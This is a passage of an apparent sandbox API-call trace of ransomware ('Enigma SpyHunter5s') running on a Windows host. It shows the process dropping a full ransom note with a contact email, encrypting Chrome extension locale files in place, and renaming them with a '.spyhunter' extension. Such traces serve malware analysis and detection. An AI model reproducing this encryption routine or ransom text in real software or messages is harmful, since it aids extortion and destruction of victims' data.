dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0160.207] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.207] GetProcessHeap () returned 0x2c0000 [0160.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.207] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceacc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceacc*=0x150, lpOverlapped=0x0) returned 1 [0160.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffeb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.208] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x25ceacc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceacc*=0x150, lpOverlapped=0x0) returned 1 [0160.208] GetProcessHeap () returned 0x2c0000 [0160.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.208] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceacc, lpOverlapped=0x0 | out: lpBuffer=0x25ceb0c*, lpNumberOfBytesWritten=0x25ceacc*=0x4, lpOverlapped=0x0) returned 1 [0160.209] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceacc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceacc*=0x30, lpOverlapped=0x0) returned 1 [0160.209] CloseHandle (hObject=0x178) returned 1 [0160.209] GetProcessHeap () returned 0x2c0000 [0160.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.209] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.spyhunter") returned 165 [0160.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.spyhunter")) returned 1 [0160.335] GetProcessHeap () returned 0x2c0000 [0160.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.335] GetProcessHeap () returned 0x2c0000 [0160.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.335] GetProcessHeap () returned 0x2c0000 [0160.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f185f8 | out: hHeap=0x2c0000) returned 1 [0160.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.336] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.337] WriteFile (in: hFile=0x9c, lpBuffer=0x25cea43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb6c, lpOverlapped=0x0 | out: lpBuffer=0x25cea43*, lpNumberOfBytesWritten=0x25ceb6c*=0x127, lpOverlapped=0x0) returned 1 [0160.337] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.337] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb6c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.338] CloseHandle (hObject=0x9c) returned 1 [0160.338] GetProcessHeap () returned 0x2c0000 [0160.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8bc8 | out: hHeap=0x2c0000) returned 1 [0160.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb08 | out: pbBuffer=0x25ceb08) returned 1 [0160.338] GetProcessHeap () returned 0x2c0000 [0160.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb00*=0x30) returned 1 [0160.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0160.339] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.339] GetProcessHeap () returned 0x2c0000 [0160.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.339] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceac4*=0x1c3, lpOverlapped=0x0) returned 1 [0160.340] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.340] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1c3, lpNumberOfBytesWritten=0x25ceac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceac4*=0x1c3, lpOverlapped=0x0) returned 1 [0160.340] GetProcessHeap () returned 0x2c0000 [0160.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.340] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.340] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceac4, lpOverlapped=0x0 | out: lpBuffer=0x25ceb04*, lpNumberOfBytesWritten=0x25ceac4*=0x4, lpOverlapped=0x0) returned 1 [0160.340] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceac4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceac4*=0x30, lpOverlapped=0x0) returned 1 [0160.340] CloseHandle (hObject=0x9c) returned 1 [0160.340] GetProcessHeap () returned 0x2c0000 [0160.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.341] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.spyhunter") returned 165 [0160.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.spyhunter")) returned 1 [0160.342] GetProcessHeap () returned 0x2c0000 [0160.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.342] GetProcessHeap () returned 0x2c0000 [0160.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.342] GetProcessHeap () returned 0x2c0000 [0160.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8a40 | out: hHeap=0x2c0000) returned 1 [0160.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.343] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.343] WriteFile (in: hFile=0x9c, lpBuffer=0x25cea3b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb64, lpOverlapped=0x0 | out: lpBuffer=0x25cea3b*, lpNumberOfBytesWritten=0x25ceb64*=0x127, lpOverlapped=0x0) returned 1 [0160.344] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.344] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb64, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb64*=0x2ac, lpOverlapped=0x0) returned 1 [0160.344] CloseHandle (hObject=0x9c) returned 1 [0160.344] GetProcessHeap () returned 0x2c0000 [0160.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8730 | out: hHeap=0x2c0000) returned 1 [0160.344] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb00 | out: pbBuffer=0x25ceb00) returned 1 [0160.344] GetProcessHeap () returned 0x2c0000 [0160.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.344] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceaf8*=0x30) returned 1 [0160.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0160.345] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.345] GetProcessHeap () returned 0x2c0000 [0160.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.345] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceabc*=0x183, lpOverlapped=0x0) returned 1 [0160.347] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.347] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x183, lpNumberOfBytesWritten=0x25ceabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceabc*=0x183, lpOverlapped=0x0) returned 1 [0160.347] GetProcessHeap () returned 0x2c0000 [0160.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.347] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.348] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceabc, lpOverlapped=0x0 | out: lpBuffer=0x25ceafc*, lpNumberOfBytesWritten=0x25ceabc*=0x4, lpOverlapped=0x0) returned 1 [0160.348] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceabc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceabc*=0x30, lpOverlapped=0x0) returned 1 [0160.349] CloseHandle (hObject=0x9c) returned 1 [0160.349] GetProcessHeap () returned 0x2c0000 [0160.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.349] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.spyhunter") returned 165 [0160.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.spyhunter")) returned 1 [0160.350] GetProcessHeap () returned 0x2c0000 [0160.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.350] GetProcessHeap () returned 0x2c0000 [0160.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.350] GetProcessHeap () returned 0x2c0000 [0160.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc85a8 | out: hHeap=0x2c0000) returned 1 [0160.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.351] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.351] WriteFile (in: hFile=0x9c, lpBuffer=0x25cea33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb5c, lpOverlapped=0x0 | out: lpBuffer=0x25cea33*, lpNumberOfBytesWritten=0x25ceb5c*=0x127, lpOverlapped=0x0) returned 1 [0160.352] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.352] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb5c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.353] CloseHandle (hObject=0x9c) returned 1 [0160.353] GetProcessHeap () returned 0x2c0000 [0160.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8420 | out: hHeap=0x2c0000) returned 1 [0160.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceaf8 | out: pbBuffer=0x25ceaf8) returned 1 [0160.353] GetProcessHeap () returned 0x2c0000 [0160.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceaf0*=0x30) returned 1 [0160.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0160.354] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.354] GetProcessHeap () returned 0x2c0000 [0160.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.354] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceab4*=0xc6, lpOverlapped=0x0) returned 1 [0160.355] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.355] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x25ceab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceab4*=0xc6, lpOverlapped=0x0) returned 1 [0160.355] GetProcessHeap () returned 0x2c0000 [0160.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.356] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.356] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceaf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceab4, lpOverlapped=0x0 | out: lpBuffer=0x25ceaf4*, lpNumberOfBytesWritten=0x25ceab4*=0x4, lpOverlapped=0x0) returned 1 [0160.357] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceab4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceab4*=0x30, lpOverlapped=0x0) returned 1 [0160.357] CloseHandle (hObject=0x9c) returned 1 [0160.357] GetProcessHeap () returned 0x2c0000 [0160.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.357] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 